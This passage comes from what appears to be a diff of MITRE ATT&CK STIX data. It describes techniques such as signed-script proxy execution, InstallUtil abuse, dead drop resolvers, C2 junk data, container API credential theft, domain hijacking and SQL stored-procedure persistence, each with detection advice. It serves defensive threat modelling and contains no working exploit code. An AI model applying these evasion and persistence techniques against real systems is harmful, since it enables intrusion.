"id": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "created": "2020-03-14T23:08:20.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/001", + "external_id": "T1090.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "System Script Proxy Execution", + "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian", + "Wes Hurd" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1216", + "external_id": "T1216" + }, + { + "source_name": "GitHub Ultimate AppLocker Bypass List", + "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", + "url": "https://github.com/api0cradle/UltimateAppLockerByPassList" + }, + { + "source_name": "LOLBAS Project", + "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", + "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Custom Command and Control Protocol", + "description": "Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", + "created": "2017-05-31T21:31:10.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1094", + "external_id": "T1094" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "created": "2020-03-14T22:24:21.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/001", + "external_id": "T1102.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "InstallUtil", + "description": "InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft.\n\nAdversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Casey Smith", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f792d02f-813d-402b-86a5-ab98cb391d3b", + "created": "2017-05-31T21:31:27.510Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1118", + "external_id": "T1118" + }, + { + "source_name": "MSDN InstallUtil", + "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx" + }, + { + "source_name": "LOLBAS Installutil", + "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-02T20:10:01.862Z", + "name": "Junk Data", + "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "created": "2020-03-15T00:30:25.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001/001", + "external_id": "T1001.001" + }, + { + "source_name": "FireEye SUNBURST Backdoor December 2020", + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Spearphishing Service", + "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "created": "2020-10-02T17:08:07.742Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1598/001", + "external_id": "T1598.001" + }, + { + "source_name": "ThreatPost Social Media Phishing", + "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", + "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-07-22T18:51:42.238Z", + "name": "Commonly Used Port", + "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", + "created": "2017-05-31T21:30:42.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1043", + "external_id": "T1043" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:13.719Z", + "name": "Internet Accessible Device", + "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. (Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0883", + "external_id": "T0883" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "NCCIC January 2014", + "description": "NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 2019/11/07 ", + "url": "https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf" + }, + { + "source_name": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler", + "description": "Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12 ", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-caught-in-the-act-running-a-realistic-factory-honeypot-to-capture-real-threats.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Container API", + "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Jay Chen, Palo Alto Networks", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436", + "created": "2021-03-31T14:01:52.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/007", + "external_id": "T1552.007" + }, + { + "source_name": "Unit 42 Unsecured Docker Daemons", + "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.", + "url": "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/" + }, + { + "source_name": "Docker API", + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/" + }, + { + "source_name": "Kubernetes API", + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Domains", + "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Jeremy Galloway" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "created": "2020-10-01T00:51:28.513Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/001", + "external_id": "T1584.001" + }, + { + "source_name": "Krebs DNS Hijack 2019", + "description": "Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.", + "url": "https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + }, + { + "source_name": "Palo Alto Unit 42 Domain Shadowing 2022", + "description": "Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.", + "url": "https://unit42.paloaltonetworks.com/domain-shadowing/" + }, + { + "source_name": "Microsoft Sub Takeover 2020", + "description": "Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.", + "url": "https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "SQL Stored Procedures", + "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Carlos Borges, @huntingneo, CIP", + "Lucas da Silva Pereira, @vulcanunsec, CIP", + "Kaspersky" + ], + "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "created": "2019-12-12T14:59:58.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/001", + "external_id": "T1505.001" + }, + { + "source_name": "NetSPI Startup Stored Procedures", + "description": "Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.", + "url": "https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/" + }, + { + "source_name": "Kaspersky MSSQL Aug 2019", + "description": "Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.", + "url": "https://securelist.com/malicious-tasks-in-ms-sql-server/92167/" + }, + { + "source_name": "Microsoft xp_cmdshell 2017", + "description": 